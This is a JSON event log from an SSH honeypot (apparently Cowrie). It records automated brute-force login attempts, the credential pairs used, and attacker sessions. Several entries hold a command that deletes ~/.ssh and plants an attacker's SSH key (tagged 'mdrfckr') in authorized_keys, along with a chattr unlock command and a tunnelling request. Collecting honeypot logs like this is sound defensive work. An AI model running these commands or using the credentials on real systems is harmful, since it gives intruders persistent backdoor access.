{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:24.071175Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:24.632015Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:27:24.632690Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:27:24.906018Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:24.906992Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47222,"dst_ip":"1.2.3.4","dst_port":22,"session":"31ba37a1ee28","protocol":"ssh","message":"New connection: 212.227.235.229:47222 (1.2.3.4:22) [session: 31ba37a1ee28]","sensor":"my-vps","timestamp":"2025-08-28T11:27:25.185019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:25.185924Z","src_ip":"212.227.235.229","session":"31ba37a1ee28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:25.462417Z","src_ip":"212.227.235.229","session":"31ba37a1ee28"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:27:26.609391Z","src_ip":"212.227.235.229","session":"31ba37a1ee28"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:27.888637Z","src_ip":"212.227.235.229","session":"31ba37a1ee28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47904,"dst_ip":"1.2.3.4","dst_port":22,"session":"9919bfe0c509","protocol":"ssh","message":"New connection: 212.227.235.229:47904 (1.2.3.4:22) [session: 9919bfe0c509]","sensor":"my-vps","timestamp":"2025-08-28T11:27:28.140143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:28.140842Z","src_ip":"212.227.235.229","session":"9919bfe0c509"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:28.407716Z","src_ip":"212.227.235.229","session":"9919bfe0c509"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:29.506580Z","src_ip":"212.227.235.229","session":"9919bfe0c509"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:29.774689Z","src_ip":"212.227.235.229","session":"9919bfe0c509"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:29.782058Z","src_ip":"212.227.235.229","session":"1020a01cbdcb"}
{"eventid":"cowrie.session.closed","duration":"301.2","message":"Connection lost after 301.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:31.572516Z","src_ip":"212.227.235.229","session":"ff9c7bd11eed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27441,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6751e433435","protocol":"ssh","message":"New connection: 212.227.125.160:27441 (1.2.3.4:22) [session: e6751e433435]","sensor":"my-vps","timestamp":"2025-08-28T11:27:36.713664Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:36.714830Z","src_ip":"212.227.125.160","session":"e6751e433435"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":27725,"dst_ip":"1.2.3.4","dst_port":22,"session":"feeb2afa84a9","protocol":"ssh","message":"New connection: 212.227.125.160:27725 (1.2.3.4:22) [session: feeb2afa84a9]","sensor":"my-vps","timestamp":"2025-08-28T11:27:36.824723Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:27:36.825379Z","src_ip":"212.227.125.160","session":"feeb2afa84a9"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T11:27:36.939229Z","src_ip":"212.227.125.160","session":"feeb2afa84a9"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:37.281215Z","src_ip":"212.227.125.160","session":"feeb2afa84a9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T11:27:37.395605Z","session":"feeb2afa84a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55808,"dst_ip":"1.2.3.4","dst_port":22,"session":"8aa9c37c9aa9","protocol":"ssh","message":"New connection: 212.227.235.229:55808 (1.2.3.4:22) [session: 8aa9c37c9aa9]","sensor":"my-vps","timestamp":"2025-08-28T11:27:42.521847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:42.522858Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:42.755732Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.login.success","username":"root","password":"aA@12345","message":"login attempt [root/aA@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:43.738922Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:44.217463Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:44.218235Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:27:44.219067Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:44.453876Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:27:44.979617Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:27:44.980290Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.212196Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.213050Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55818,"dst_ip":"1.2.3.4","dst_port":22,"session":"06fb69bafbac","protocol":"ssh","message":"New connection: 212.227.235.229:55818 (1.2.3.4:22) [session: 06fb69bafbac]","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.431783Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.432620Z","src_ip":"212.227.235.229","session":"06fb69bafbac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.658223Z","src_ip":"212.227.235.229","session":"06fb69bafbac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59188,"dst_ip":"1.2.3.4","dst_port":22,"session":"a69f45adaba9","protocol":"ssh","message":"New connection: 212.227.125.160:59188 (1.2.3.4:22) [session: a69f45adaba9]","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.717608Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.719166Z","src_ip":"212.227.125.160","session":"a69f45adaba9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:27:45.884074Z","src_ip":"212.227.125.160","session":"a69f45adaba9"}
{"eventid":"cowrie.login.failed","username":"test","password":"123123","message":"login attempt [test/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T11:27:46.584778Z","src_ip":"212.227.125.160","session":"a69f45adaba9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:27:46.630835Z","src_ip":"212.227.235.229","session":"06fb69bafbac"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:47.752047Z","src_ip":"212.227.125.160","session":"a69f45adaba9"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:47.860695Z","src_ip":"212.227.235.229","session":"06fb69bafbac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55834,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d6547d615c2","protocol":"ssh","message":"New connection: 212.227.235.229:55834 (1.2.3.4:22) [session: 0d6547d615c2]","sensor":"my-vps","timestamp":"2025-08-28T11:27:48.090000Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:27:48.091207Z","src_ip":"212.227.235.229","session":"0d6547d615c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:27:48.310152Z","src_ip":"212.227.235.229","session":"0d6547d615c2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:27:49.244636Z","src_ip":"212.227.235.229","session":"0d6547d615c2"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:49.463234Z","src_ip":"212.227.235.229","session":"0d6547d615c2"}
